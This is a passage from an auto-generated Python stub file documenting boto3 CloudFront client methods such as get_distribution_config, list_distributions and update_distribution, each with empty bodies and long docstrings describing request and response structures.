'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
}
},
'ETag': 'string'
}
:returns:
(string) --
"""
pass
def get_distribution_config(Id=None):
"""
Get the configuration information about a distribution.
See also: AWS API Documentation
:example: response = client.get_distribution_config(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The distribution's ID.
:rtype: dict
:return: {
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
},
'ETag': 'string'
}
:returns:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
"""
pass
def get_invalidation(DistributionId=None, Id=None):
"""
Get the information about an invalidation.
See also: AWS API Documentation
:example: response = client.get_invalidation(
DistributionId='string',
Id='string'
)
:type DistributionId: string
:param DistributionId: [REQUIRED]
The distribution's ID.
:type Id: string
:param Id: [REQUIRED]
The identifier for the invalidation request, for example, IDFDVBD632BHDS5 .
:rtype: dict
:return: {
'Invalidation': {
'Id': 'string',
'Status': 'string',
'CreateTime': datetime(2015, 1, 1),
'InvalidationBatch': {
'Paths': {
'Quantity': 123,
'Items': [
'string',
]
},
'CallerReference': 'string'
}
}
}
:returns:
(string) --
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_streaming_distribution(Id=None):
"""
Gets information about a specified RTMP distribution, including the distribution configuration.
See also: AWS API Documentation
:example: response = client.get_streaming_distribution(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The streaming distribution's ID.
:rtype: dict
:return: {
'StreamingDistribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
}
},
'ETag': 'string'
}
:returns:
(string) --
"""
pass
def get_streaming_distribution_config(Id=None):
"""
Get the configuration information about a streaming distribution.
See also: AWS API Documentation
:example: response = client.get_streaming_distribution_config(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The streaming distribution's ID.
:rtype: dict
:return: {
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
},
'ETag': 'string'
}
:returns:
(string) --
"""
pass
def get_waiter():
"""
"""
pass
def list_cloud_front_origin_access_identities(Marker=None, MaxItems=None):
"""
Lists origin access identities.
See also: AWS API Documentation
:example: response = client.list_cloud_front_origin_access_identities(
Marker='string',
MaxItems='string'
)
:type Marker: string
:param Marker: Use this when paginating results to indicate where to begin in your list of origin access identities. The results include identities in the list that occur after the marker. To get the next page of results, set the Marker to the value of the NextMarker from the current page's response (which is also the ID of the last identity on that page).
:type MaxItems: string
:param MaxItems: The maximum number of origin access identities you want in the response body.
:rtype: dict
:return: {
'CloudFrontOriginAccessIdentityList': {
'Marker': 'string',
'NextMarker': 'string',
'MaxItems': 123,
'IsTruncated': True|False,
'Quantity': 123,
'Items': [
{
'Id': 'string',
'S3CanonicalUserId': 'string',
'Comment': 'string'
},
]
}
}
"""
pass
def list_distributions(Marker=None, MaxItems=None):
"""
List distributions.
See also: AWS API Documentation
:example: response = client.list_distributions(
Marker='string',
MaxItems='string'
)
:type Marker: string
:param Marker: Use this when paginating results to indicate where to begin in your list of distributions. The results include distributions in the list that occur after the marker. To get the next page of results, set the Marker to the value of the NextMarker from the current page's response (which is also the ID of the last distribution on that page).
:type MaxItems: string
:param MaxItems: The maximum number of distributions you want in the response body.
:rtype: dict
:return: {
'DistributionList': {
'Marker': 'string',
'NextMarker': 'string',
'MaxItems': 123,
'IsTruncated': True|False,
'Quantity': 123,
'Items': [
{
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
},
]
}
}
:returns:
(string) --
"""
pass
def list_distributions_by_web_acl_id(Marker=None, MaxItems=None, WebACLId=None):
"""
List the distributions that are associated with a specified AWS WAF web ACL.
See also: AWS API Documentation
:example: response = client.list_distributions_by_web_acl_id(
Marker='string',
MaxItems='string',
WebACLId='string'
)
:type Marker: string
:param Marker: Use Marker and MaxItems to control pagination of results. If you have more than MaxItems distributions that satisfy the request, the response includes a NextMarker element. To get the next page of results, submit another request. For the value of Marker , specify the value of NextMarker from the last response. (For the first request, omit Marker .)
:type MaxItems: string
:param MaxItems: The maximum number of distributions that you want CloudFront to return in the response body. The maximum and default values are both 100.
:type WebACLId: string
:param WebACLId: [REQUIRED]
The ID of the AWS WAF web ACL that you want to list the associated distributions. If you specify 'null' for the ID, the request returns a list of the distributions that aren't associated with a web ACL.
:rtype: dict
:return: {
'DistributionList': {
'Marker': 'string',
'NextMarker': 'string',
'MaxItems': 123,
'IsTruncated': True|False,
'Quantity': 123,
'Items': [
{
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
},
]
}
}
:returns:
(string) --
"""
pass
def list_invalidations(DistributionId=None, Marker=None, MaxItems=None):
"""
Lists invalidation batches.
See also: AWS API Documentation
:example: response = client.list_invalidations(
DistributionId='string',
Marker='string',
MaxItems='string'
)
:type DistributionId: string
:param DistributionId: [REQUIRED]
The distribution's ID.
:type Marker: string
:param Marker: Use this parameter when paginating results to indicate where to begin in your list of invalidation batches. Because the results are returned in decreasing order from most recent to oldest, the most recent results are on the first page, the second page will contain earlier results, and so on. To get the next page of results, set Marker to the value of the NextMarker from the current page's response. This value is the same as the ID of the last invalidation batch on that page.
:type MaxItems: string
:param MaxItems: The maximum number of invalidation batches that you want in the response body.
:rtype: dict
:return: {
'InvalidationList': {
'Marker': 'string',
'NextMarker': 'string',
'MaxItems': 123,
'IsTruncated': True|False,
'Quantity': 123,
'Items': [
{
'Id': 'string',
'CreateTime': datetime(2015, 1, 1),
'Status': 'string'
},
]
}
}
"""
pass
def list_streaming_distributions(Marker=None, MaxItems=None):
"""
List streaming distributions.
See also: AWS API Documentation
:example: response = client.list_streaming_distributions(
Marker='string',
MaxItems='string'
)
:type Marker: string
:param Marker: The value that you provided for the Marker request parameter.
:type MaxItems: string
:param MaxItems: The value that you provided for the MaxItems request parameter.
:rtype: dict
:return: {
'StreamingDistributionList': {
'Marker': 'string',
'NextMarker': 'string',
'MaxItems': 123,
'IsTruncated': True|False,
'Quantity': 123,
'Items': [
{
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
},
]
}
}
:returns:
(string) --
"""
pass
def list_tags_for_resource(Resource=None):
"""
List tags for a CloudFront resource.
See also: AWS API Documentation
:example: response = client.list_tags_for_resource(
Resource='string'
)
:type Resource: string
:param Resource: [REQUIRED]
An ARN of a CloudFront resource.
:rtype: dict
:return: {
'Tags': {
'Items': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
"""
pass
def tag_resource(Resource=None, Tags=None):
"""
Add tags to a CloudFront resource.
See also: AWS API Documentation
:example: response = client.tag_resource(
Resource='string',
Tags={
'Items': [
{
'Key': 'string',
'Value': 'string'
},
]
}
)
:type Resource: string
:param Resource: [REQUIRED]
An ARN of a CloudFront resource.
:type Tags: dict
:param Tags: [REQUIRED]
A complex type that contains zero or more Tag elements.
Items (list) --A complex type that contains Tag elements.
(dict) --A complex type that contains Tag key and Tag value.
Key (string) -- [REQUIRED]A string that contains Tag key.
The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
Value (string) --A string that contains an optional Tag value.
The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
"""
pass
def untag_resource(Resource=None, TagKeys=None):
"""
Remove tags from a CloudFront resource.
See also: AWS API Documentation
:example: response = client.untag_resource(
Resource='string',
TagKeys={
'Items': [
'string',
]
}
)
:type Resource: string
:param Resource: [REQUIRED]
An ARN of a CloudFront resource.
:type TagKeys: dict
:param TagKeys: [REQUIRED]
A complex type that contains zero or more Tag key elements.
Items (list) --A complex type that contains Tag key elements.
(string) --A string that contains Tag key.
The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
"""
pass
def update_cloud_front_origin_access_identity(CloudFrontOriginAccessIdentityConfig=None, Id=None, IfMatch=None):
"""
Update an origin access identity.
See also: AWS API Documentation
:example: response = client.update_cloud_front_origin_access_identity(
CloudFrontOriginAccessIdentityConfig={
'CallerReference': 'string',
'Comment': 'string'
},
Id='string',
IfMatch='string'
)
:type CloudFrontOriginAccessIdentityConfig: dict
:param CloudFrontOriginAccessIdentityConfig: [REQUIRED]
The identity's configuration information.
CallerReference (string) -- [REQUIRED]A unique number that ensures the request can't be replayed.
If the CallerReference is new (no matter the content of the CloudFrontOriginAccessIdentityConfig object), a new origin access identity is created.
If the CallerReference is a value already sent in a previous identity request, and the content of the CloudFrontOriginAccessIdentityConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request.
If the CallerReference is a value you already sent in a previous request to create an identity, but the content of the CloudFrontOriginAccessIdentityConfig is different from the original request, CloudFront returns a CloudFrontOriginAccessIdentityAlreadyExists error.
Comment (string) -- [REQUIRED]Any comments you want to include about the origin access identity.
:type Id: string
:param Id: [REQUIRED]
The identity's id.
:type IfMatch: string
:param IfMatch: The value of the ETag header that you received when retrieving the identity's configuration. For example: E2QWRUHAPOMQZL .
:rtype: dict
:return: {
'CloudFrontOriginAccessIdentity': {
'Id': 'string',
'S3CanonicalUserId': 'string',
'CloudFrontOriginAccessIdentityConfig': {
'CallerReference': 'string',
'Comment': 'string'
}
},
'ETag': 'string'
}
"""
pass
def update_distribution(DistributionConfig=None, Id=None, IfMatch=None):
"""
Update a distribution.
See also: AWS API Documentation
:example: response = client.update_distribution(
DistributionConfig={
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
},
Id='string',
IfMatch='string'
)
:type DistributionConfig: dict
:param DistributionConfig: [REQUIRED]
The distribution's configuration information.
CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed.
If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution.
If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request.
If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution.
Specify only the object name, for example, index.html . Do not add a / before the object name.
If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element.
To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element.
To replace the default root object, update the distribution configuration and specify the new object.
For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide .
Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution.
Quantity (integer) -- [REQUIRED]The number of origins for this distribution.
Items (list) --A complex type that contains origins for this distribution.
(dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin.
For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference .
Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution.
